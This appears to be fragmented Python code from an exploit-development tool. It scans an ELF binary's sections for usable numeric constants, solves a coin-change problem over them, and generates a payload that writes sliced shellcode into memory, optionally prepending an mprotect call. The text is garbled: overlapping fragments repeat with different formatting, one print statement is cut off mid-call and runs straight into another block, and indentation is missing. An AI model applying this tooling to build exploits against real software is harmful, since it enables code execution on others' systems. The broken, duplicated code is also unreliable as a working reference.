if prepend_mprotect:
bin_shellcode = "%s%s" % (build_mprotect_stack(stack_frame, stack_frame + 0x10), hex_str_repr_2_str(shellcode))
else:
bin_shellcode = hex_str_repr_2_str(shellcode)
try:
f = open(binary, "rb")
except Exception as ex:
print("Can't open file %s: %s" % (argv[1], ex), file=stderr)
exit(1)
if bin_shellcode is not None:
slices = slice_shellcode(switch_endianness(pad_shellcode(bin_shellcode, pad_char="\x00")))
print(slices)
slice_gaps = get_slice_gaps(slices)
candidates = get_numbers(f, section_names, 0xffffffff, use_segment=use_segment, no_null_bytes=True)
#candidates = get_numbers(f, section_names, slice_gaps[0][1], use_segment=True, no_null_bytes=True)
f.close()
coins = list(set(candidates.values()))
pg = PayloadGenerator()
if prologue:
python_code += pg.add_prologue()
first = True
for gap in slice_gaps:
# Not elegant, but for first element, remove the initial value of accumulator register
if first:
first_gap = list(gap)
accumulator_value += first_gap[1] - 1
first_gap[1] = abs(cmp2(first_gap[1] - initial_reg_value))
if (section_names is None) and (not use_segment):
section_names = (".interp", ".note.ABI-tag", ".hash", ".gnu.hash",
".dynsym", ".dynstr", ".gnu.version",
".gnu.version_r", ".rel.dyn", ".rel.plt", ".init",
".plt", ".text", ".fini", ".rodata", ".eh_frame",
".comment")
elif (section_names is None) and use_segment:
section_names = (".text", ".data")
try:
f = open(args.filename, "rb")
except Exception as ex:
print("Can't open file %s: %s" % (argv[1], ex), file=stderr)
exit(1)
candidates = get_numbers(f, section_names, change, exclude, use_segment,
no_null_bytes)
f.close()
if candidates != None:
unique_values = set(candidates.values())
#oper, results = solve_dp(list(unique_values), change)
oper, results = solve_gready(list(unique_values), change)
if oper != 0:
print("Found a solution using %u operations: %s" % (oper, results))
else:
print("No solution was found. Exiting...", file=stderr)
exit(2)
else:
print("Found no candidate numbers in elf file. Exiting...",
bin_shellcode = hex_str_repr_2_str(shellcode)
try:
f = open(binary, "rb")
except Exception as ex:
print("Can't open file %s: %s" % (argv[1], ex), file=stderr)
exit(1)
if bin_shellcode is not None:
slices = slice_shellcode(
switch_endianness(pad_shellcode(bin_shellcode, pad_char="\x00")))
print(slices)
slice_gaps = get_slice_gaps(slices)
candidates = get_numbers(f,
section_names,
0xffffffff,
use_segment=use_segment,
no_null_bytes=True)
#candidates = get_numbers(f, section_names, slice_gaps[0][1], use_segment=True, no_null_bytes=True)
f.close()
coins = list(set(candidates.values()))
pg = PayloadGenerator()
if prologue:
python_code += pg.add_prologue()
first = True
for gap in slice_gaps:
# Not elegant, but for first element, remove the initial value of accumulator register
if first:
first_gap = list(gap)
exclude.append(0)
else:
exclude = [0]
if (section_names is None) and (not use_segment):
section_names = (".interp", ".note.ABI-tag", ".hash", ".gnu.hash", ".dynsym", ".dynstr", ".gnu.version", ".gnu.version_r", ".rel.dyn", ".rel.plt", ".init", ".plt", ".text", ".fini", ".rodata", ".eh_frame", ".comment")
elif (section_names is None) and use_segment:
section_names = (".text", ".data")
try:
f = open(args.filename, "rb")
except Exception as ex:
print("Can't open file %s: %s" % (argv[1], ex), file=stderr)
exit(1)
candidates = get_numbers(f, section_names, change, exclude, use_segment, no_null_bytes)
f.close()
if candidates != None:
unique_values = set(candidates.values())
#oper, results = solve_dp(list(unique_values), change)
oper, results = solve_gready(list(unique_values), change)
if oper != 0:
print("Found a solution using %u operations: %s" % (oper, results))
else:
print("No solution was found. Exiting...", file=stderr)
exit(2)
else:
print("Found no candidate numbers in elf file. Exiting...", file=stderr)
